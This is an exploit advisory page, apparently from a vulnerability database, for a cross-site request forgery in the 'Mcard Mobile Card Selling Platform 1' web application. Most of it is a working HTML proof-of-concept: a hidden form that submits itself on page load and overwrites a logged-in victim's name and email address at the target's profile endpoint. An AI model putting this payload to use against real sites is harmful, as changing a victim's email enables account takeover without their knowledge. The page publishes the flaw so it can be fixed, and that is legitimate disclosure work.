Mcard Mobile Card Selling Platform 1 Cross Site Request Forgery

2018.05.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery # Date: 2018-05-23 # Exploit Author: L0RD # Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15 # Version: 1 # Tested on: Kali linux # POC : <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://Target/card/profile" method="POST"> <input type="hidden" name="fname" value="decode" /> <input type="hidden" name="lname" value="test" /> <input type="hidden" name="email" value="lord&#46;decode&#64;gmail&#46;com" /> </form> <script> document.forms[0].submit(); </script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top